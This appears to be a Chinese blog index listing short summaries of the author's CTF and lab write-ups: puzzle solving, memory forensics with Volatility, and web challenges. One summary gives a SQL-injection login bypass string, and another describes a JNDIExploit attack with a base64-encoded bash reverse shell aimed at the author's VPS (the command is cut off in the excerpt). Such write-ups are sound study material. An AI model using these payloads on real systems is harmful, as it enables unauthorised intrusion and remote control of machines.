返回顶部
摘要: MISC Sign-in 关注公众号 DORAEMON 根据注释得知6位纯数字密码,直接爆破 得到密码:376852 解压zip得到图片,修改高度得到被遮住两个定位点的二维码 ps修一下得到二维码,扫码即可 汝闻,人言否 文件尾有PK,只不过反过来变成KP了,一共有两处都反了改回来 然后binwal 阅读全文
posted @ 2022-02-21 13:58 cnnloghph 阅读(134) 评论(0) 推荐(0)
摘要: 题目: 一. 漏洞 在登录页面存在sql注入,可用万能密码进行登录 用户名: admin' or 1=1# 密码: 随便 这道题就是加固这个登录页面的sql注入即可获取flag 二. 加固 根据给的地址和端口ssh连接目标机器,进入/var/www/html目录 在此处新建一个phpinfo.php 阅读全文
posted @ 2022-02-04 15:33 cnnloghph 阅读(679) 评论(0) 推荐(0)
摘要: Misc gogogo 下载解压得到两个文件夹,一个是一堆拼图,一个是raw文件所以进行拼图和取证 取证步骤 上来先看imageinfo python2 vol.py -f 2.raw imageinfo 看下桌面 python2 vol.py -f 2.raw --profile=WinXPSP2 阅读全文
posted @ 2022-01-25 11:22 cnnloghph 阅读(186) 评论(0) 推荐(0)
摘要: 声明: 该文章来自本人日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与本人无关 JNDIExploit 先将反弹shell的命令base64编码,然后将里面的+号和=号进行一次url编码 注:IP填vps公网ip,PORT要和nc监听的端口对应 bash -i >& / 阅读全文
posted @ 2022-01-14 10:31 cnnloghph 阅读(695) 评论(0) 推荐(0)
摘要: 解题过程 题目一 八卦迷宫 用画图工具手工连接,然后将路上的图表和字相对应 按顺序打出,然后根据题目要求换成全拼,加上图片里的前缀cazy{}提交 flag为: cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyicha 阅读全文
posted @ 2022-01-08 21:20 cnnloghph 阅读(423) 评论(0) 推荐(0)
摘要: web1 题目:开发注释未及时删除 查看页面源代码即可 web2 题目:js把鼠标右键和f12屏蔽了 方法一: 禁用JavaScript 方法二: url前面加上view-source: web3 题目:抓个包试试 抓包在请求包发现flag web4 题目:总有人把后台地址写入robots 访问ro 阅读全文
posted @ 2021-12-08 11:53 cnnloghph 阅读(143) 评论(0) 推荐(0)
摘要: MISC [签到]签到 直接提交flag即可 flag:flag{Dnui_ctf_2021_s1gn_in} [萌新]在哪呢 ctrl+a全选发现有个空白的地方被选中了 在kali打开选中,拿到flag flag:flag{hey_there_is_no_thing} 只是个PNG,别想太多了.p 阅读全文
posted @ 2021-12-06 19:57 cnnloghph 阅读(273) 评论(0) 推荐(0)
摘要: 1.签到题-Crypto Vigenere 根据题目Vigenere可看出是维吉尼亚密码 使用在线解码工具破解 https://guballa.de/vigenere-solver flag:flag{53d613fc-6c5c-4dd6-b3ce-8bc867c6f648} 2.Misc hell 阅读全文
posted @ 2021-11-28 12:39 cnnloghph 阅读(887) 评论(0) 推荐(0)
Live2D